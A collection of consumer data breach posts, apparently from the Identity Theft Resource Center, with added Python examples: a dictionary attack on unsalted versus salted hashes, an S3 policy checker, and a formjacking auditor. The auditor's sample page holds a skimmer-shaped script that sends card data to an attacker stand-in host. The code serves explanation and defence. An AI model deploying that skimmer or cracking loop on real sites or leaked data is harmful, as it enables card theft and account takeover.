Some FabFitFun members are trying to figure out what steps to take following the FabFitFun data breach. FabFitFun, a company that mails customized boxes of products to its members, suffered a data breach as the result of formjacking, in which an attacker inserts malicious code into a legitimate website’s checkout page; the code quietly copies credit card details and, in some cases, other personal information while the transaction processes as normal.

According to the Office of the Vermont Attorney General, FabFitFun’s technical team discovered malicious code that had been placed on the company’s website without authorization. The breach notification letter states the malicious code was placed on the “Shop” portion of the website on May 2 and removed on May 6. FabFitFun says the data breach did not affect the “Add-Ons” and “Box Purchases” portions of the website.

Members who completed purchases between May 2 and May 6 may have had personal information exposed in the FabFitFun data breach, including names, addresses, cities, states, ZIP codes, phone numbers, email addresses, credit card numbers, CVV codes and card expiration dates. Members who began checking out during that window but did not complete a purchase could have had their names, addresses, cities, states, ZIP codes, phone numbers and email addresses exposed; those members are not believed to have had any credit card information leaked.

After learning of the malicious code, FabFitFun removed it and offered affected members an annual membership. Anyone whose information was exposed in the FabFitFun data breach should contact their credit or debit card issuer and follow its recommendations, monitor their card statements for suspicious activity and report anything suspicious to the bank listed on the card. For fraudulent charges, members should file an Identity Theft Report with the Federal Trade Commission and keep a copy for their records in case a creditor requires it to clear the fraudulent charges.

Members affected by the FabFitFun data breach can also live-chat with an Identity Theft Resource Center expert advisor, or call toll-free at 888.400.5530. They can also download the free ID Theft Help App, where they can create a customized log to track all their steps in resolving their data breach case, access ITRC advisors for a personalized action plan, resources and much more.


Arbonne Data Exposure Compromises Thousands of Accounts

Arbonne International, LLC, a worldwide skin care and health product company that operates under a multi-level marketing model, announced that it had discovered a compromise of its computer systems. After noticing unusual, unauthorized activity on its network, Arbonne hired a third-party security firm to investigate the scope of the Arbonne data exposure.

While the investigation is still incomplete, it found that an unknown party gained access to certain parts of the system. No highly sensitive information such as Social Security numbers was compromised, and no payment card information was accessed. To be safe, Arbonne nevertheless forced a password reset on affected users’ accounts and notified the proper authorities. The company also issued data breach notification letters for the Arbonne data exposure and is offering affected users one year of identity monitoring, as required by state law.

While Arbonne continues to sort out how the exposure happened and how far it extends, it serves as an important reminder to all tech users about the need for good passphrase practices. Short passwords are no longer secure enough; experts recommend a longer “passphrase” that is hard for malicious actors to guess but easy for the user to remember. With passphrases, users may be more willing to create a new one for every account instead of reusing a password, or changing it by a single letter or digit, when an incident like the Arbonne data exposure arises.

Arbonne account holders should monitor their other accounts carefully for the foreseeable future to keep a close watch for any suspicious activity. If they see suspicious activity, they should contact their bank immediately. Victims of the Arbonne data exposure can also live-chat with an Identity Theft Resource Center advisor or call the ITRC toll-free at 888.400.5530. Victims can also download the free ID Theft Help App for iOS or Android, which allows victims to track their steps in a case management tool, live-chat with an advisor, access resources and much more.


ShinyHunters Hacks Expose Business Vulnerabilities

Since 2005, the Identity Theft Resource Center (ITRC) has been tracking publicly notified breaches, building one of the most comprehensive repositories of data in the U.S. that is updated daily.

One of the most recent cybercrimes the ITRC reported involves a cybercrime ring, ShinyHunters, stealing the information of over 200 million customers from at least 13 different companies. In early May, ShinyHunters posted 15 million customer records on the dark web. Two days later, the hacking group began offering the entire database to buyers, which included 91 million user accounts from an Indonesian website.

Since then, ShinyHunters has offered more than 100 million users’ account information at popular websites like dating app Zoosk, meal kit company Home Chef, design-focused marketplace Minted, Minnesota’s Star Tribune newspaper, health and wellness website Mindful, photo printing service Chatbooks and online publication Chronicle of Higher Education.

While not all of those companies have acknowledged ShinyHunters’ claims, more are confirming the breaches as they verify that data was stolen. One of the latest companies to confirm a data breach was Mathway, a popular education app for iPhone and Android devices. The stolen information is believed to include data about children, who are the app’s primary users. The Mathway data was offered on the dark web for $4,000 in bitcoin for 25 million stolen user accounts.

ShinyHunters has acknowledged the hacks. In an interview with WIRED magazine, a member of the group said “it is not too hard” to breach so many organizations, adding that “it’s just a way to make money.”

Groups that commit wholesale data theft are not the amateurs of TV shows and movies. They are professional threat actors that run their operations like any business, with advertising and marketing campaigns, help desks and customer support, all in service of stealing people’s information and converting it into cash.

Two other recent data breaches the ITRC has noted were of PaperlessPay, a third-party provider that handles personal information such as W-2s and paystubs, and Wishbone, a social media app that lets users compare products and then interact with other users to find out which products are hot and which are not.

In February, federal law enforcement investigators found identity thieves selling PaperlessPay client data. The personal information compromised included the names, addresses, pay and withholdings, Social Security numbers and bank account numbers, in some cases.

As for Wishbone, hackers are selling 40 million account profiles, which include names, email addresses, phone numbers, locations, genders, social media profiles and hashed account passwords. Hashing is a one-way transformation rather than reversible encryption, and a properly hashed password (a unique salt per user, run through a deliberately slow algorithm) is expensive to recover even when the database leaks. Wishbone, however, used an outdated, fast hashing algorithm, so a password-cracking tool can recover most of the passwords simply by hashing common guesses and comparing the results. This is the latest breach for Wishbone, which was also successfully attacked in 2017.
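To show why that distinction matters, here is an added example in Python; it is not code from Wishbone or from the original post. It hashes a constructed set of three users’ passwords first with an outdated fast, unsalted hash (MD5 stands in here; the post does not name Wishbone’s algorithm) and then with a salted, slow key derivation function (PBKDF2-HMAC-SHA256 from the standard library), and runs the same small dictionary attack against both. The wordlist, usernames and passwords are made up for the demonstration.

```python
import hashlib
import secrets

# Constructed wordlist of common guesses; real attacks use lists with millions
# of entries, but the mechanics are identical.
WORDLIST = ["123456", "password", "qwerty", "letmein", "wishbone2020", "sunshine"]

# Work factor for the slow scheme: every guess costs this many HMAC rounds.
PBKDF2_ITERATIONS = 100_000


def fast_unsalted_hash(password):
    """Outdated scheme: one fast hash, no salt (MD5 stands in for any fast hash)."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(wordlist):
    """Precompute hash -> password once. Without salts, this single table
    cracks every user in the leaked database at the cost of one lookup each."""
    return {fast_unsalted_hash(w): w for w in wordlist}


def crack_unsalted(leaked_hashes, table):
    """Return {leaked_hash: recovered_password} for every hash found in the table."""
    return {h: table[h] for h in leaked_hashes if h in table}


def slow_salted_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Modern scheme: random per-user salt + slow KDF. Returns (salt, derived_key)."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key


def verify_salted(password, salt, stored_key, iterations=PBKDF2_ITERATIONS):
    _, key = slow_salted_hash(password, salt, iterations)
    return secrets.compare_digest(key, stored_key)


def crack_salted(leaked_records, wordlist, iterations=PBKDF2_ITERATIONS):
    """Dictionary attack on salted records: no shared table is possible, so the
    attacker re-runs the slow KDF for every (user, guess) pair. Returns
    ({username: password}, number_of_kdf_calls)."""
    recovered, kdf_calls = {}, 0
    for user, (salt, key) in leaked_records.items():
        for guess in wordlist:
            kdf_calls += 1
            if verify_salted(guess, salt, key, iterations):
                recovered[user] = guess
                break
    return recovered, kdf_calls


def demo():
    # Constructed leaked credential database: two weak passwords, one strong.
    users = {"alice": "password", "bob": "wishbone2020", "carol": "Tr0ub4dor&3"}

    leaked_fast = {u: fast_unsalted_hash(p) for u, p in users.items()}
    table = build_lookup_table(WORDLIST)          # built once, reused for all users
    cracked_fast = crack_unsalted(leaked_fast.values(), table)

    leaked_slow = {u: slow_salted_hash(p) for u, p in users.items()}
    cracked_slow, kdf_calls = crack_salted(leaked_slow, WORDLIST)
    return cracked_fast, cracked_slow, kdf_calls


if __name__ == "__main__":
    fast, slow, calls = demo()
    print("unsalted fast hash: recovered", sorted(fast.values()), "with one lookup table")
    print("salted PBKDF2:      recovered", slow, "after", calls,
          "KDF calls of", PBKDF2_ITERATIONS, "rounds each")
```

Both schemes give up the two weak passwords; the difference is cost. The unsalted table is built once and amortised over every user in the dump, while the salted scheme forces a separate slow KDF run per user and per guess (13 runs for three users here), so the attacker’s work grows with the size of the database and the strength of the passwords. Only the strong password survives either attack, which is why strong, unique passphrases still matter even when a site hashes properly.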

Businesses must keep their cybersecurity and data protection up to date. If they do not, the result can be data breaches and lost revenue from customers who no longer trust the business with their personal information. It is equally important for consumers to make sure the apps, websites and businesses they share data with have strong security in place. Consumers are encouraged to ask questions before sharing personal information so they can take their business to companies that take data protection and privacy seriously.

If someone believes they have had their information exposed as part of a data breach, or is a victim of identity theft due to a data breach, they can live-chat with an ITRC expert advisor. They can also call toll-free at 888.400.5530. Advisors can help victims create action plans that are tailored to them. Victims can also download the ID Theft Help App. The app lets them track their case in a case log, access resources and tips to help them protect their identity and more.

Join us on our weekly data breach podcast to get the latest perspectives on the last week in breaches. Subscribe to get it delivered on your preferred podcast platform.



Since 2005, the Identity Theft Resource Center has compiled publicly reported U.S. data breaches as part of its data breach tracking efforts. While our 2019 Data Breach Report revealed a 17 percent annual increase in data breaches compared to 2018, the first quarter of 2020 saw a decrease, both in the number of incidents and in the number of individuals impacted.

In the first quarter of 2020, there were 337 publicly reported breaches and exposures. During the same period in 2019, 520 data events were reported, 183 more than in 2020. In terms of people impacted, 131 million individuals were affected from January through March of 2020. While that might sound like a lot, 442 million people had their data compromised during the same timeframe in 2019. Overall, the number of data compromises decreased by about 35 percent, and the number of people affected by roughly 70 percent, in the first three months of 2020. Any decrease in data compromises is a good thing, but it’s important to understand what’s behind the drop in the numbers.

The ITRC tracks both publicly reported data breaches and data exposures in a database with 25 information fields and 63 identity attributes that is updated daily. While the ITRC maintains one of the most comprehensive repositories of data compromises, not all incidents are publicly reported, and there can be significant delays between when a breach occurs and when it is publicly reported. Both factors can depress the count of publicly reported data events for a given period.

There are other reasons why the ITRC’s data could be different from other data breach reports – especially those that are reporting an increase in data compromises in Q1 2020. For example, the ITRC reports the number of records compromised based on the number of individuals impacted, not the number of records stolen or exposed. We believe this methodology gives a more accurate view of the human impact of a data breach or exposure since a single person may have multiple records involved in a single event.

The COVID-19 pandemic could have also played a role in the data breach decrease (particularly in March) as threat actors turned their attention to using the data they already had to launch phishing attacks and COVID-19 scams rather than launching new mass cyberattacks. However, there is no substantive proof of why there was such a drastic decline in the first quarter numbers. With that said, the ITRC believes data breaches could return to a more traditional trendline later in 2020.



Five State Unemployment Department Data Exposures Uncover System Flaws

This blog will be updated as more information becomes available

Reports of accidental exposures and data leaks from six different states’ unemployment websites have some consumers concerned. Illinois, Arkansas, Colorado, Ohio, Florida and, most recently, Kentucky have all suffered unemployment department data exposures after rushing to set up convenient, self-service websites for people seeking unemployment benefits because of coronavirus closures.

Pandemic Unemployment Assistance, or PUA, offers federal assistance to those who are affected by the quarantine. The PUA can be especially helpful as self-employed people, independent contractors and other “gig economy” workers can receive assistance during this time.

In an effort to expedite the submission and processing of these applications, many states have relied on outside vendors to establish their PUA application web portals. Unfortunately, in the rush to help consumers, some of those websites launched before they could be thoroughly quality tested and reviewed for security. The multiple unemployment department data exposures left tens of thousands of users’ complete identities exposed, leading to even more cause for concern.

In each of the six states, the PUA application sites were taken down until they could be secured. Two states, Colorado and Ohio, were notified by Deloitte, their vendor, as to the exposure. One state is already offering credit monitoring to all 72,000 of its PUA recipients, while the others are still investigating and could offer support as their findings unfold.

Also, due to the difficulties surrounding quarantine and employment at this time, the Identity Theft Resource Center has seen cases where workers received notifications that their unemployment application was approved, even though they had not applied for assistance or were still working. However, there is no known link between those cases and the current issues with the Pandemic Unemployment Assistance sites.

All consumers should remain aware of the threat, regardless of their current employment status. If anyone suspects that their personally identifiable information has been exposed or compromised, they are encouraged to place a freeze on their credit reports with the three major credit reporting agencies. They are also encouraged to use anti-virus solutions to secure their devices and protect their online accounts, update their old passwords to a stronger passphrase and make sure none of those passphrases on their personal accounts are also used on their work accounts.

Anyone who has questions or believes they have been affected by an unemployment department data exposure is urged to live-chat with an Identity Theft Resource Center expert advisor. Victims can also call the ITRC toll-free at 888.400.5530. Another tool for victims of a data breach or data exposure is the ID Theft Help App. The app can serve as a “breach activity” case manager for those impacted.



Fourteen million Key Ring customers, mostly in North America, may have had their personally identifiable information exposed in a Key Ring data leak involving the company’s Amazon S3 storage buckets. S3 buckets can hold vast amounts of data. A newly created bucket is private by default, but keeping it that way is the customer’s (in this case Key Ring’s) responsibility: a bucket becomes readable by anyone on the internet only when its owner grants public access through a bucket policy or access control list, and that kind of misconfiguration is what leaves buckets like these open.

The Key Ring data leak was discovered in January 2020 by security researchers Noam Rotem and Ran Locar of vpnMentor, who reported their findings to both Amazon Web Services and Key Ring. The databases were secured sometime after February 18, when the researchers first contacted the company.

Key Ring is a digital wallet app that stores uploaded images of its customers’ loyalty and gift cards so that shopping and mobile payments are more streamlined. While Key Ring is not intended to store more sensitive documents such as driver’s licenses, ID cards and payment cards, some users saved images of those anyway. The uploaded card images sat unprotected in Key Ring’s storage buckets, leading to the accidental Key Ring data leak.
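An added example, in Python, of the check a bucket owner can run offline against a bucket policy before trusting it; this is not Key Ring’s or vpnMentor’s code, and the bucket name, account ID and role name are placeholders. It flags Allow statements that grant read actions to an anonymous principal, then weighs the result against the bucket’s Block Public Access settings, because the RestrictPublicBuckets setting is the one that neutralises a public policy that already exists.

```python
import fnmatch
import json

# Constructed policy of the kind that makes every object world-readable.
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-card-images",
                     "arn:aws:s3:::example-card-images/*"],
    }],
})

# Same (placeholder) bucket restricted to one application role in the owning account.
PRIVATE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppRoleOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/card-image-service"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-card-images/*",
    }],
})

# Actions that let an outsider list or download objects.
READ_ACTIONS = ("s3:getobject", "s3:listbucket")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}, i.e. anyone on the internet."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _grants_read(actions):
    """True if any action pattern (s3:GetObject, s3:Get*, s3:*, *) covers a read."""
    return any(fnmatch.fnmatchcase(read, pattern.lower())
               for pattern in _as_list(actions)
               for read in READ_ACTIONS)


def public_read_statements(policy_json):
    """Return findings for Allow statements that give anonymous read access.

    Statements carrying a Condition (for example on aws:SourceVpce or
    aws:SourceIp) are still reported, marked conditional, for a human to review.
    Explicit Deny statements are not evaluated, so treat the output as a list of
    suspects rather than a full IAM policy evaluation."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if _is_anonymous(stmt.get("Principal")) and _grants_read(stmt.get("Action", [])):
            findings.append({
                "sid": stmt.get("Sid", "<no Sid>"),
                "actions": _as_list(stmt.get("Action")),
                "conditional": "Condition" in stmt,
            })
    return findings


def bucket_is_exposed(policy_json, public_access_block):
    """Combine policy findings with the Block Public Access configuration.

    RestrictPublicBuckets makes S3 ignore a public policy for anonymous and
    cross-account callers, so an existing public policy stops mattering once it
    is on. BlockPublicPolicy only rejects new public policies, and the two ACL
    settings do not affect policies at all, so neither is consulted here."""
    unconditional = [f for f in public_read_statements(policy_json) if not f["conditional"]]
    if not unconditional:
        return False
    return not public_access_block.get("RestrictPublicBuckets", False)


if __name__ == "__main__":
    for name, policy in (("public", PUBLIC_POLICY), ("private", PRIVATE_POLICY)):
        print(name, public_read_statements(policy),
              "exposed:", bucket_is_exposed(policy, {"RestrictPublicBuckets": False}))
```

The public policy is reported and the bucket counts as exposed unless RestrictPublicBuckets is on; the role-scoped policy produces no findings. ACL-based exposure is a separate check against the bucket’s ACL grants (AllUsers and AuthenticatedUsers grantees) and is not covered by this policy scan.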

There is no way of knowing whether this information was accessed by malicious actors; the data was discovered by researchers who look for unsecured databases in order to inform their owners. However, if hackers did get hold of the leaked information, they could target the customers with spam or phishing attempts, take over the customers’ accounts, potentially use their payment methods for online shopping and more. Any customer who believes their data may have been compromised in the Key Ring data leak can contact Key Ring for information about what protection is being offered. Those potentially affected should immediately change the passwords on their loyalty accounts, monitor their bank accounts for suspicious transactions, consider credit monitoring services and a credit freeze, and be on the lookout for phishing emails.

Anyone who believes they have been affected by the Key Ring data leak can live-chat with an Identity Theft Resource Center expert advisor or call toll-free at 888.400.5530. They can also download the ID Theft Help App, which allows victims to track their steps in a customized case log.


Online Shopping Safety a Priority During Coronavirus Pandemic

From groceries and household goods to medicine and clothes, the coronavirus pandemic has forced people to do much of their shopping online. According to data from ACI Worldwide, online retail sales in March 2020 were up as much as 74 percent year over year. While online shopping plays an important role in allowing people to stay home and shop safely during COVID-19, hackers are taking note as well. That could be part of the reason retail and manufacturing companies are seeing the most attacks, and it is why it is so important for consumers to practice online shopping safety and not expose their personally identifiable information (PII) unwittingly.

Online shopping has grown in popularity and ease of use over the years. Its increased use during COVID-19 could heighten the risk of formjacking, in which cybercriminals insert malicious code into an existing, reputable website and capture the sensitive information users type into its forms. The shopper’s card details are sent to the attackers even as the cart and payment are processed by the retailer exactly as they should be, so neither side sees anything wrong. According to CNBC, e-skimming attacks intended to steal people’s personal information while shopping online were already increasing before COVID-19. Online shopping amid the pandemic has also led to an increase in fake goods being sold online, like fake cures, vaccines and tests.
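The formjacking described here, and in the FabFitFun post earlier on this page, depends on two things: injected script that runs on the checkout page, and a channel to send the captured card data out. As an added example, not code from the original posts, FabFitFun or any retailer, here is the kind of check in Python that a site owner can run against a checkout page and its Content-Security-Policy header to catch both. The sample page, hostnames and policies are constructed; the inline script in the sample mimics a skimmer only so that the check has something to find.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page: one first-party script with Subresource Integrity,
# one third-party script without it, and an inline script shaped like a
# skimmer (it copies the card field and beacons it to an outside host).
SAMPLE_HTML = """
<html><body>
<form id="checkout" action="/api/pay" method="post">
  <input name="card"><input name="cvv"><button>Pay</button>
</form>
<script src="https://shop.example/static/checkout.js"
        integrity="sha384-placeholderDigest" crossorigin="anonymous"></script>
<script src="https://cdn.third-party.example/widget.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var card = document.querySelector("[name=card]").value;
    new Image().src = "https://collect.attacker.example/?c=" + encodeURIComponent(card);
  });
</script>
</body></html>
"""

# Constructed policies: a restrictive one and a permissive one.
STRICT_CSP = ("default-src 'self'; script-src 'self' https://cdn.third-party.example; "
              "connect-src 'self'; form-action 'self'")
WEAK_CSP = "default-src *; script-src * 'unsafe-inline'"

URL_RE = re.compile(r"https?://[^\s\"'+)]+")


class CheckoutAudit(HTMLParser):
    """Collect (finding, detail) pairs while walking the page."""

    def __init__(self, page_origin):
        super().__init__()
        self.page_host = urlparse(page_origin).hostname
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src is None:
                self._in_inline_script = True
                self.findings.append(("inline script present", "<script> without src"))
            else:
                host = urlparse(src).hostname
                if host and host != self.page_host and "integrity" not in a:
                    self.findings.append(("third-party script without SRI", src))
        elif tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host and host != self.page_host:
                self.findings.append(("form posts to another origin", a["action"]))

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies as raw data; look for outbound URLs.
        if self._in_inline_script:
            for url in URL_RE.findall(data):
                host = urlparse(url).hostname
                if host and host != self.page_host:
                    self.findings.append(("inline script references external host", host))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def parse_csp(header):
    """'a b c; d e' -> {'a': ['b', 'c'], 'd': ['e']}"""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def csp_allows(policy, directive, host):
    """Does the directive (or its default-src fallback) permit loads from host?"""
    for source in policy.get(directive, policy.get("default-src", [])):
        if source == "*":
            return True
        if source.startswith("'"):            # keywords such as 'self', 'none'
            continue
        allowed = urlparse(source if "//" in source else "//" + source).hostname
        if allowed is None:                    # scheme-only sources such as https:
            continue
        if allowed == host or (allowed.startswith("*.") and host.endswith(allowed[1:])):
            return True
    return False


def audit(html, page_origin, csp_header):
    parser = CheckoutAudit(page_origin)
    parser.feed(html)
    policy = parse_csp(csp_header)
    gaps = []
    script_src = policy.get("script-src", policy.get("default-src", []))
    if not script_src or "'unsafe-inline'" in script_src:
        gaps.append("script-src permits inline scripts")
    for kind, host in parser.findings:
        if kind == "inline script references external host":
            # A skimmer needs an outbound channel: image beacons use img-src,
            # fetch/XHR/sendBeacon use connect-src.
            for directive in ("img-src", "connect-src"):
                if csp_allows(policy, directive, host):
                    gaps.append(f"{directive} allows exfiltration to {host}")
    return {"findings": parser.findings, "csp_gaps": gaps}


if __name__ == "__main__":
    for label, csp in (("strict", STRICT_CSP), ("weak", WEAK_CSP)):
        print(label, audit(SAMPLE_HTML, "https://shop.example", csp))
```

Against the strict policy the page still has findings worth fixing (an unpinned third-party script and an inline script that talks to an outside host), but the policy itself blocks both the inline script and the beacon, so the skimmer would not run or would have nowhere to send the data. Against the weak policy every gap is open. A real skimmer is usually obfuscated and injected into a script that is already on the page rather than added as a new tag, so the findings from the HTML walk are a starting point; the CSP and SRI checks are what hold up regardless of how the code was injected.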

Fraudsters understand consumers’ need to buy essential and nonessential goods during COVID-19 and are taking advantage. Tenable Research identified an SMS spoofing flaw that could have allowed an attacker to send spoofed messages to any mobile number. Although the flaw has been patched, attackers could have exploited it to deliver malicious links that appeared to come from a trusted sender.

Despite the risks of shopping online, there are things consumers can do to practice online shopping safety. People should make sure all of their transactions take place on legitimate business websites that they navigate to directly, rather than through links in emails or text messages. If someone comes across fake products, they should report them to the National IPR Center or the Consumer Product Safety Commission. Finally, when creating an account to shop online, consumers should choose security questions whose answers cannot be guessed or looked up on social media.

To reduce the likelihood of falling for a phishing attempt while shopping online, consumers should protect their computers and devices with security software, enable multi-factor authentication on their accounts and back up their data. These steps reduce the chance of falling for a scam or becoming a victim of identity theft. If someone believes they are a victim of identity theft or has questions about online shopping safety, they can live-chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530.


CAM4 Data Exposure Leaks Billions of Records From Adult Streaming Website

A recent CAM4 data exposure left nearly 11 billion records exposed. A team of researchers uncovered the leak at CAM4, an adult streaming website. According to komando.com, just over 6.5 million of those records are estimated to belong to users in the U.S. The information leaked in the CAM4 data exposure included full names, email addresses and payment logs. Parent company Granity Entertainment took the database down immediately once the exposure was discovered; however, the logs appear to have been exposed since March 16.

According to the researchers, in an article published by Security Boulevard, a large share of the email addresses came from popular domains like Gmail, Hotmail and iCloud, whose providers also offer supplementary services such as cloud storage and business tools. If attackers use the leaked details to phish those accounts, or try passwords reused from other breaches against them, compromised CAM4 users could see large volumes of personal data (photographs, videos and related business information) exposed to hackers.

CAM4 is not the only adult website to have had a large amount of user information exposed or breached. In August 2015, hackers infiltrated Ashley Madison, a “hookup” website, stole the names of 37 million account holders and released them online.

If fraudsters get hold of the CAM4 user information, they could send sextortion scams: emails claiming to have compromising videos or pictures of the user and threatening to release them unless a ransom is paid. Anyone affected by the CAM4 data exposure who receives such an email should treat it as a scam and ignore it.

While those affected by the CAM4 data exposure are at increased risk of receiving sextortion scams, it is not enough to ignore the emails; it is equally important not to click any links, open any attachments or download any files associated with them. Victims should also change the password on their CAM4 account and on any other account that shares the same password. If anyone believes they have been affected by the CAM4 data exposure, they can live-chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530. Advisors can help potential victims create an action plan that is personalized to them.


Third Chegg Data Breach in Three Years Impacts Nearly 700 Employees

Multi-billion dollar education tech company Chegg—which specializes in digital and print textbook rentals, as well as online homework help solutions—announced it suffered another data breach. This Chegg data breach impacted approximately 700 of its employees. It marked the third data breach of Chegg or its acquisitions since 2018.

Unlike the 2018 Chegg data breach, which compromised the account records of an estimated 40 million users, this breach affected current and former employees. Those employees’ personally identifiable information is believed to have been stolen, including their names and Social Security numbers. Another data breach was disclosed in 2019, days after Chegg acquired another platform, Thinkful.

There’s been speculation that sites like Chegg could become more of a target for hackers now that so many educational institutions are closed due to COVID-19. Having transferred their learning to internet-based distance learning options, students and professors alike have been taking greater advantage of online homework and test prep help. The increase in traffic could lead hackers to go after these companies to steal identities or payment methods. However, there is no proof that Chegg has become more of a target or that the latest Chegg data breach is due to schools being closed.

Chegg notified the affected employees of the recent breach, and under California law, the employees are entitled to some protective measures. Anyone who has had their information compromised in any type of data breach should consider requesting a no-cost freeze on their credit reports from the three major credit reporting agencies—Equifax, Experian and TransUnion. While it may take a few more steps when a consumer is looking to apply for credit, a freeze is one of the most robust preventative measures a person can implement to safeguard their identity credentials. Also, consumers who are concerned about the security of their personally identifiable information can look for credit monitoring and identity theft solutions that will keep them informed if anyone uses their data.

Victims of the Chegg data breach should also file their tax returns as soon as possible. With the delay in the filing deadline due to disruption caused by COVID-19, a significant number of taxpayers could choose to put off filing until things are more stable and they can safely visit a tax preparer. While it is one less thing to worry about right now, it is also a longer timeframe for identity thieves to file a fraudulent tax return in someone else’s name.

Anyone who thinks they are a victim of the Chegg data breach can live chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530.


Bill & Melinda Gates Foundation, CDC, NIH and WHO Employee Information Exposed

Nearly 25,000 public health organization employees had their email addresses and passwords exposed after the credentials were dumped online. According to the SITE Intelligence Group, a U.S.-based hacktivist is the likely source of the Bill & Melinda Gates Foundation, Centers for Disease Control and Prevention (CDC), National Institutes of Health (NIH) and World Health Organization (WHO) employee information being exposed. CNET reported that the email addresses and passwords appear to have come from data that was breached and first posted online in 2016. According to the Washington Post, the hacker was encouraging people to break into the agencies’ email accounts to “uncover” what was happening at the organizations in regard to COVID-19.

The leaked data was reported in April and is believed to have come from a larger set of breached information. Fortunately, the leaked passwords affected only one system at WHO, an older extranet. WHO has reported an increase in attempted intrusions and in fraudulent emails sent by attackers posing as WHO employees. However, WHO says that increase is not a result of this leak, in particular because the exposed WHO employee information was old.

WHO said the following in a statement: “Ensuring the security of health information for Member States and the privacy of users interacting with us is a priority for WHO at all times, but also particularly during the COVID-19 pandemic. We are all in this fight together.”

The Gates Foundation reported that they do not currently have an indication of a data breach at their foundation. However, employees at the affected organizations should change their passwords and the passwords of any other accounts that have the same credentials. The WHO employee information being exposed is another reminder of the importance of using strong, unique passwords, and never using the same password across multiple accounts.

If someone believes they had their WHO or other organization’s employee information exposed, or is a victim of identity theft, they can live chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530. Advisors will help people create an action plan that is personalized to their set of circumstances.

